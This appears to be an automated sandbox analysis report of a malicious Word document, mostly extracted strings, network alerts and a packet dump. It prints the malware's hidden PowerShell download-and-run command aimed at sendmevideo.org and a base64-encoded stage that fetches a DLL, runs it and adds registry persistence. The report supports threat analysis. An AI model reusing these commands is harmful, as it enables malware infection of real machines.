GET /dh2025e/eh.dll HTTP/1.1 Host: sendmevideo.org Connection: Keep-Alive 200 OK
More Details

Format

Details

Request

GET /dh2025e/eh.dll HTTP/1.1
Host: sendmevideo.org
Connection: Keep-Alive

Raw Hex

     0 : 0A 00 27 00 00 00 0A 00 27 A3 FB FD 08 00 45 00 [..'.....'.....E.]
    10 : 00 77 01 72 40 00 80 06 4C 7C C0 A8 38 0F 56 6A [.w.r@...L|..8.Vj]
    20 : 5D 71 F8 37 00 50 16 4A C7 8E 51 52 3B EE 50 18 []q.7.P.J..QR;.P.]
    30 : FA F0 F9 D2 00 00 47 45 54 20 2F 64 68 32 30 32 [......GET /dh202]
    40 : 35 65 2F 65 68 2E 64 6C 6C 20 48 54 54 50 2F 31 [5e/eh.dll HTTP/1]
    50 : 2E 31 0D 0A 48 6F 73 74 3A 20 73 65 6E 64 6D 65 [.1..Host: sendme]
    60 : 76 69 64 65 6F 2E 6F 72 67 0D 0A 43 6F 6E 6E 65 [video.org..Conne]
    70 : 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 [ction: Keep-Aliv]
    80 : 65 0D 0A 0D 0A [e....]

Suricata Alerts

Event	Category	Description	SID
86.106.93.113 -> local:63543 (TCP)	Misc activity	ET INFO Packed Executable Download	2014819
86.106.93.113 -> local:63543 (TCP)	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP	2018959
86.106.93.113 -> local:63543 (TCP)	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	2016538

ET rules applied using Suricata.

Extracted Strings

Download All Memory Strings (8.3KiB)

!&+eGdxeGdxeGdx

Ansi based on PCAP Processing (network.pcap)

!This program cannot be run in DOS mode.$

Ansi based on PCAP Processing (network.pcap)

"Hw"w P^O;<aY`GkxmPY[g

Ansi based on Dropped File (~WRD0000.tmp)

#c2@XbOvm

Ansi based on PCAP Processing (network.pcap)

$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P

Ansi based on Dropped File (~WRD0000.tmp)

$Equifax Secure Certificate Authority0

Ansi based on PCAP Processing (network.pcap)

$http://g.symcb.com/crls/gtglobal.crl0!

Ansi based on PCAP Processing (network.pcap)

%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y

Ansi based on Dropped File (~WRD0000.tmp)

%ALLUSERSPROFILE%\mvdrt.dll,#1

Ansi based on Process Commandline (rundll32.exe)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

%s "%s", %s

Unicode based on Dropped File (carved_0.dll.1509628513544)

%s - %lu

Ansi based on Dropped File (carved_0.dll.1509628513544)

'''-''''''''''

Ansi based on Image Processing (screen_6.png)

''-''

Ansi based on Image Processing (screen_3.png)

'j,'u8M#8M#8M

Ansi based on Dropped File (~WRD0000.tmp)

)@_^J26)6

Ansi based on PCAP Processing (network.pcap)

)http://crl.geotrust.com/crls/secureca.crl0N

Ansi based on PCAP Processing (network.pcap)

*.android.com

Ansi based on PCAP Processing (network.pcap)

*.appengine.google.com

Ansi based on PCAP Processing (network.pcap)

*.cloud.google.com

Ansi based on PCAP Processing (network.pcap)

*.db833953.google.cn

Ansi based on PCAP Processing (network.pcap)

*.gcp.gvt2.com

Ansi based on PCAP Processing (network.pcap)

*.google-analytics.com

Ansi based on PCAP Processing (network.pcap)

*.google.ca

Ansi based on PCAP Processing (network.pcap)

*.google.cl

Ansi based on PCAP Processing (network.pcap)

*.google.co.in

Ansi based on PCAP Processing (network.pcap)

*.google.co.jp

Ansi based on PCAP Processing (network.pcap)

*.google.co.uk

Ansi based on PCAP Processing (network.pcap)

*.google.com

Ansi based on PCAP Processing (network.pcap)

*.google.com.ar

Ansi based on PCAP Processing (network.pcap)

*.google.com.au

Ansi based on PCAP Processing (network.pcap)

*.google.com.br

Ansi based on PCAP Processing (network.pcap)

*.google.com.co

Ansi based on PCAP Processing (network.pcap)

*.google.com.mx

Ansi based on PCAP Processing (network.pcap)

*.google.com.tr

Ansi based on PCAP Processing (network.pcap)

*.google.com.vn

Ansi based on PCAP Processing (network.pcap)

*.google.com0Y0

Ansi based on PCAP Processing (network.pcap)

*.google.de

Ansi based on PCAP Processing (network.pcap)

*.google.es

Ansi based on PCAP Processing (network.pcap)

*.google.fr

Ansi based on PCAP Processing (network.pcap)

*.google.hu

Ansi based on PCAP Processing (network.pcap)

*.google.it

Ansi based on PCAP Processing (network.pcap)

*.google.nl

Ansi based on PCAP Processing (network.pcap)

*.google.pl

Ansi based on PCAP Processing (network.pcap)

*.google.pt

Ansi based on PCAP Processing (network.pcap)

*.googleadapis.com

Ansi based on PCAP Processing (network.pcap)

*.googleapis.cn

Ansi based on PCAP Processing (network.pcap)

*.googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

*.googlevideo.com

Ansi based on PCAP Processing (network.pcap)

*.gstatic.cn

Ansi based on PCAP Processing (network.pcap)

*.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.gvt1.com

Ansi based on PCAP Processing (network.pcap)

*.gvt2.com

Ansi based on PCAP Processing (network.pcap)

*.metric.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.urchin.com

Ansi based on PCAP Processing (network.pcap)

*.url.google.com

Ansi based on PCAP Processing (network.pcap)

*.youtube-nocookie.com

Ansi based on PCAP Processing (network.pcap)

*.youtube.com

Ansi based on PCAP Processing (network.pcap)

*.youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

*.ytimg.com

Ansi based on PCAP Processing (network.pcap)

,_,_.

Ansi based on Image Processing (screen_6.png)

,__,,

Ansi based on Image Processing (screen_0.png)

-'--'-

Ansi based on Image Processing (screen_3.png)

-enc JABXAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAkAHAAPQAoACQARQBuAHYAOgBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQArACIAXABtAHYAZAByAHQALgBkAGwAbAAiACkAOwANAAoAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AA0ACgAkAFcALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAbgBkAG0AZQB2AGkAZABlAG8ALgBvAHIAZwAvAGQAaAAyADAAMgA1AGUALwBlAGgALgBkAGwAbAAiACwAJABwACkAOwANAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApAHsADQAKACQAcgBkAF8AcAA9ACQARQBuAHYAOgBTAFkAUwBUAEUATQBSAE8ATwBUACsAIgBcAFMAeQBzAHQAZQBtADMAMgBcAHIAdQBuAGQAbABsADMAMgAuAGUAeABlACIAOwANAAoAJABwAF8AYQA9ACQAcAArACIALAAjADEAIgA7AA0ACgAkAHAAcgA9AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAHIAZABfAHAAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABwAF8AYQA7AA0ACgAkAHAAXwBiAGEAdAA9ACgAJABFAG4AdgA6AEEATABMAFUAUwBFAFIAUwBQAFIATwBGAEkATABFACsAIgBcAG0AdgBkAHIAdAAuAGIAYQB0ACIAKQA7AA0ACgAkAHQAZQB4AHQAPQAnAHMAZQB0ACAAaQBuAHMAdABfAHAAYwBrACAAPQAgACIAJQBBAEwATABVAFMARQBSAFMAUABSAE8ARgBJAEwARQAlAFwAbQB2AGQAcgB0AC4AZABsAGwAIgAnACsAIgBgAHIAYABuACIAKwAnAGkAZgAgAE4ATwBUACAAZQB4AGkAcwB0ACAAJQBpAG4AcwB0AF8AcABjAGsAIAAlACAAKABlAHgAaQB0ACkAJwArACIAYAByAGAAbgAiACsAJwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAgACUAaQBuAHMAdABfAHAAYwBrACAAJQAsACMAMQAnAA0ACgBbAGkAbwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQAKAAkAHAAXwBiAGEAdAAsACQAdABlAHgAdAApAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBOAGEAbQBlACAAJwBVAHMAZQByAEkAbgBpAHQATQBwAHIATABvAGcAbwBuAFMAYwByAGkAcAB0ACcAIAAtAFYAYQBsAHUAZQAgACIAJABwAF8AYgBhAHQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA0ACgB9AA==

Ansi based on Process Commandline (powershell.exe)

-https://www.geotrust.com/resources/repository0

Ansi based on PCAP Processing (network.pcap)

.:N#H

Ansi based on Dropped File (~WRD0000.tmp)

.edata

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$2

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$3

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$4

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$5

Ansi based on Dropped File (carved_0.dll.1509628513544)

.idata$6

Ansi based on Dropped File (carved_0.dll.1509628513544)

.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K

Ansi based on Dropped File (~WRD0000.tmp)

.rdata

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rdata$zzzdbg

Ansi based on PCAP Processing (network.pcap)

.rsrc

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rsrc$01

Ansi based on Dropped File (carved_0.dll.1509628513544)

.rsrc$02

Ansi based on Dropped File (carved_0.dll.1509628513544)

.text

Ansi based on Dropped File (carved_0.dll.1509628513544)

.text$mn

Ansi based on Dropped File (carved_0.dll.1509628513544)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<

Ansi based on Dropped File (~WRD0002.tmp)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,

Ansi based on Dropped File (~WRD0000.tmp)

/dh2025e/eee.txt

Ansi based on PCAP Processing (PCAP)

/dh2025e/eh.dll

Ansi based on PCAP Processing (PCAP)

/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"

Ansi based on Process Commandline (WINWORD.EXE)

/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0

Ansi based on Dropped File (~WRD0000.tmp)

0"0?0P0g0y0

Ansi based on PCAP Processing (network.pcap)

0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE

Ansi based on Dropped File (~WRD0000.tmp)

020521040000Z

Ansi based on PCAP Processing (network.pcap)

042dsDl>

Ansi based on PCAP Processing (network.pcap)

0___D',0_0___'_ee8_

Ansi based on Image Processing (screen_3.png)

12493

Unicode based on Dropped File (carved_0.dll.1509628513544)

170522113237Z

Ansi based on PCAP Processing (network.pcap)

171024090717Z

Ansi based on PCAP Processing (network.pcap)

171030134419Z

Ansi based on PCAP Processing (network.pcap)

171229000000Z0f1

Ansi based on PCAP Processing (network.pcap)

180821040000Z0B1

Ansi based on PCAP Processing (network.pcap)

181231235959Z0I1

Ansi based on PCAP Processing (network.pcap)

1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%

Ansi based on Dropped File (~WRD0000.tmp)

2-01-3cf7-0009

Ansi based on PCAP Processing (network.pcap)

21171006134419Z0t1

Ansi based on PCAP Processing (network.pcap)

2D2X2i2w2

Ansi based on PCAP Processing (network.pcap)

3*313?3T3<4N4

Ansi based on PCAP Processing (network.pcap)

3U3k3s3z3

Ansi based on PCAP Processing (network.pcap)

4"4/4<4N4

Ansi based on PCAP Processing (network.pcap)

4.5O5^5l5z5

Ansi based on PCAP Processing (network.pcap)

433j238bG*Dc=Iod%rD\'<DbQ|

Ansi based on Dropped File (~WRD0000.tmp)

49Ds7 !|V>7rtx3iQ!V$

Ansi based on Dropped File (~WRD0000.tmp)

5"5/5<5K5x5

Ansi based on PCAP Processing (network.pcap)

5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2

Ansi based on Dropped File (~WRD0000.tmp)

6&6^6p6}6

Ansi based on PCAP Processing (network.pcap)

6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht

Ansi based on Dropped File (~WRD0000.tmp)

7%858B8P8a8

Ansi based on PCAP Processing (network.pcap)

7A7S7`7m7

Ansi based on PCAP Processing (network.pcap)

7gu"lV

Ansi based on Dropped File (carved_0.dll.1509628513544)

7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE

Ansi based on Dropped File (~WRD0000.tmp)

7s9f__agla78_e_3s71saf_a84686a84g3f39O14aea7lda_6869d_

Ansi based on Image Processing (screen_6.png)

9;5AT7_CMjFD4x#@74x#@2x#XdmZo,To

Ansi based on Dropped File (~WRD0000.tmp)

9AMFP97ex#@CAoDD74x#@2x#XdmZo,To

Ansi based on Dropped File (~WRD0000.tmp)

9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS

Ansi based on Dropped File (~WRD0000.tmp)

:___-,-

Ansi based on Image Processing (screen_6.png)

< <.<R<]<k<

Ansi based on PCAP Processing (network.pcap)

<0<;<P<X<`<~<

Ansi based on PCAP Processing (network.pcap)

<9SZ}}iDc

Ansi based on PCAP Processing (network.pcap)

<h1>Not Found</h1>The requested URL // was not found on this server.

Ansi based on Dropped File (VRzZ5.vnd[1].txt)

<xI1n

Ansi based on Dropped File (carved_0.dll.1509628513544)

='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~

Ansi based on Dropped File (~WRD0000.tmp)

=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+

Ansi based on Dropped File (~WRD0000.tmp)

=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.

Ansi based on Dropped File (~WRD0000.tmp)

>/>6>P>i>q>

Ansi based on PCAP Processing (network.pcap)

>`~{`PNfQS];6#6jwVt0xrQCM_-oiv

Ansi based on Dropped File (~WRD0000.tmp)

>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,

Ansi based on Dropped File (~WRD0000.tmp)

>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET

Ansi based on Dropped File (~WRD0000.tmp)

?______J

Ansi based on Image Processing (screen_0.png)

?_O-~\Tn`z&{(

Ansi based on PCAP Processing (network.pcap)

@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&

Ansi based on Dropped File (~WRD0000.tmp)

@.data

Ansi based on Dropped File (carved_0.dll.1509628513544)

@.reloc

Ansi based on Dropped File (carved_0.dll.1509628513544)

@Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

@DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

@Dotum

Unicode based on Runtime Data (WINWORD.EXE )

@DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

@FangSong

Unicode based on Runtime Data (WINWORD.EXE )

@Gulim

Unicode based on Runtime Data (WINWORD.EXE )

@GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

@Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

@GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

@KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

@Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@SimHei

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DAD29B0][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Unicode based on Runtime Data (WINWORD.EXE )

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}if (Test-Path $p){ $rd_p='%WINDIR%\+"\System32\rundll32.exe"New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;

Ansi based on Process Commandline (00040970-00001420)

\JeL{Q*Fj[q]SIrK+\ri+^%%J@{G3r?hR[ozb4f@/^Uc""P|}~6}1oV:DHp*;\)4{uw%n0,vB9)MbdY:]}0,N%d7I 4PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I

Ansi based on Dropped File (~WRD0002.tmp)

\JeL{QJ*[r]SI2%x.MHNRtfgV@

Ansi based on Dropped File (~WRD0000.tmp)

]3j%L]CBr#7@>KVkZ^-d ukW.+"p!

Ansi based on Dropped File (~WRD0000.tmp)

^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!

Ansi based on Dropped File (~WRD0000.tmp)

^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc

Ansi based on Dropped File (~WRD0000.tmp)

_'iard__O

Ansi based on Image Processing (screen_3.png)

_0,,J

Ansi based on Image Processing (screen_0.png)

_0_,,

Ansi based on Image Processing (screen_0.png)

_::_::_

Ansi based on Image Processing (screen_3.png)

_;-_'_-_'',_'t-_-,t-_-,

Ansi based on Image Processing (screen_3.png)

_?m?J?_?_,q_?_,?_??_m??_?_v____,_,_

Ansi based on Image Processing (screen_0.png)

__''_''__

Ansi based on Image Processing (screen_6.png)

___'__

Ansi based on Image Processing (screen_6.png)

___1i___'c_.crti_'._c_'c_

Ansi based on Image Processing (screen_3.png)

____8,0

Ansi based on Image Processing (screen_6.png)

_____

Ansi based on Image Processing (screen_6.png)

________

Ansi based on Image Processing (screen_6.png)

_______Find_

Ansi based on Image Processing (screen_3.png)

____ln

Ansi based on Image Processing (screen_6.png)

___P_

Ansi based on Image Processing (screen_6.png)

__g__

Ansi based on Image Processing (screen_6.png)

__Replace

Ansi based on Image Processing (screen_3.png)

_a9i;

Ansi based on Image Processing (screen_6.png)

_COpY

Ansi based on Image Processing (screen_3.png)

_diting

Ansi based on Image Processing (screen_6.png)

_i8_0_

Ansi based on Image Processing (screen_6.png)

_l.8_0.ll_

Ansi based on Image Processing (screen_3.png)

_l__'_l_

Ansi based on Image Processing (screen_3.png)

_m_m,,,

Ansi based on Image Processing (screen_0.png)

_nnat

Ansi based on Image Processing (screen_3.png)

_pAyLoAD

Ansi based on Image Processing (screen_0.png)

`.rdata

Ansi based on Dropped File (carved_0.dll.1509628513544)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

AaBbc(

Ansi based on Image Processing (screen_6.png)

AaebccD(

Ansi based on Image Processing (screen_6.png)

ab_in

Ansi based on Image Processing (screen_3.png)

ADVAPI32.dll

Ansi based on PCAP Processing (network.pcap)

again

Ansi based on Image Processing (screen_3.png)

Agency FB

Unicode based on Runtime Data (WINWORD.EXE )

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

aH$in

Ansi based on Dropped File (carved_0.dll.1509628513544)

Aharoni

Unicode based on Runtime Data (WINWORD.EXE )

Algerian

Unicode based on Runtime Data (WINWORD.EXE )

Andalus

Unicode based on Runtime Data (WINWORD.EXE )

android.clients.google.com

Ansi based on PCAP Processing (network.pcap)

android.com

Ansi based on PCAP Processing (network.pcap)

Angsana New

Unicode based on Runtime Data (WINWORD.EXE )

AngsanaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Aparajita

Unicode based on Runtime Data (WINWORD.EXE )

Arabic Typesetting

Unicode based on Runtime Data (WINWORD.EXE )

Arial

Unicode based on Runtime Data (WINWORD.EXE )

Arial Black

Unicode based on Runtime Data (WINWORD.EXE )

Arial Narrow

Unicode based on Runtime Data (WINWORD.EXE )

Arial Rounded MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

ARQAlAFwAbQB2AGQAcgB0AC4AZABsAGwAIgAnACsAIgBgAHIAYABuACIAKwAnAGkAZgAgAE4ATwBUACAAZQB4AGkAcwB0ACAAJQBpAG4AcwB0AF8AcABjAGsAIAAlACAAKABlAHgAaQB0ACkAJwArACIAYAByAGAAbgAiACsAJwBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAgACUAaQBuAHMAdABfAHAAYwBrACAAJQAsACMAMQAnAA0ACgBbAGkAbwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAFQAZQB4AHQAKAAkAHAAXwBiAGEAdAAsACQAdABlAHgAdAApAA0ACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsADQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAEUAbgB2AGkAcgBvAG4AbQBlAG4AdAAnACAALQBOAGEAbQBlACAAJwBVAHMAZQByAEkAbgBpAHQATQBwAHIATABvAGcAbwBuAFMAYwByAGkAcAB0ACcAIAAtAFYAYQBsAHUAZQAgACIAJABwAF8AYgBhAHQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA0ACgB9AA==

Ansi based on PCAP Processing (network.pcap)

ation

Unicode based on Dropped File (carved_0.dll.1509628513544)

authroot.stl

Ansi based on PCAP Processing (network.pcap)

AutoConfigURL

Unicode based on Runtime Data (rundll32.exe )

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

aV!uRQyxX'h

Ansi based on PCAP Processing (network.pcap)

Baskerville Old Face

Unicode based on Runtime Data (WINWORD.EXE )

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

Bauhaus 93

Unicode based on Runtime Data (WINWORD.EXE )

BB0744FB

Unicode based on Runtime Data (WINWORD.EXE )

Bell MT

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB Demi

Unicode based on Runtime Data (WINWORD.EXE )

Bernard MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Blackadder ITC

Unicode based on Runtime Data (WINWORD.EXE )

Bn9h{<my-'=ZFUjpTAJ?QX

Ansi based on Dropped File (~WRD0000.tmp)

Bodoni MT

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Black

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Book Antiqua

Unicode based on Runtime Data (WINWORD.EXE )

Bookman Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Bookshelf Symbol 7

Unicode based on Runtime Data (WINWORD.EXE )

Bradley Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Britannic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Broadway

Unicode based on Runtime Data (WINWORD.EXE )

Browallia New

Unicode based on Runtime Data (WINWORD.EXE )

BrowalliaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV

Ansi based on Dropped File (~WRD0000.tmp)

c9o:m

Ansi based on Dropped File (carved_0.dll.1509628513544)

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a

Ansi based on Process Commandline (powershell.exe)

C:_r_ramsmi_a_A_m_mSWard.ex

Ansi based on Image Processing (screen_3.png)

c==/6g b&*+Qb]bw*N3#_tgK}BVQ~>\'!`"7/e}x ]\+`J)nGOt:_NIW2^cU'd%#[){?PK!EOMword/fontTable.xmlj0K{2uJ6>XF7o f~f>kQU/%INU>~xVV+d`CY+m'i)M\LYPVwpv/q}wK3[3YlFVqdcG`/k(|jbg]tFNN8c(LEY-r8i68VPqNd\B@lQ=44@78Ug-^fVrlj|`c'

Ansi based on Dropped File (~WRD0000.tmp)

California1

Ansi based on PCAP Processing (network.pcap)

Californian FB

Unicode based on Runtime Data (WINWORD.EXE )

Calisto MT

Unicode based on Runtime Data (WINWORD.EXE )

Cambria Math

Unicode based on Runtime Data (WINWORD.EXE )

Candara

Unicode based on Runtime Data (WINWORD.EXE )

Castellar

Unicode based on Runtime Data (WINWORD.EXE )

Centaur

Unicode based on Runtime Data (WINWORD.EXE )

Century

Unicode based on Runtime Data (WINWORD.EXE )

Century Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Century Schoolbook

Unicode based on Runtime Data (WINWORD.EXE )

cfootprint

Ansi based on PCAP Processing (network.pcap)

change

Ansi based on Image Processing (screen_3.png)

Chiller

Unicode based on Runtime Data (WINWORD.EXE )

Clipbaard

Ansi based on Image Processing (screen_6.png)

CloseHandle

Ansi based on PCAP Processing (network.pcap)

Colonna MT

Unicode based on Runtime Data (WINWORD.EXE )

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

CompanyName

Unicode based on Dropped File (carved_0.dll.1509628513544)

Consolas

Unicode based on Runtime Data (WINWORD.EXE )

Constantia

Unicode based on Runtime Data (WINWORD.EXE )

Cooper Black

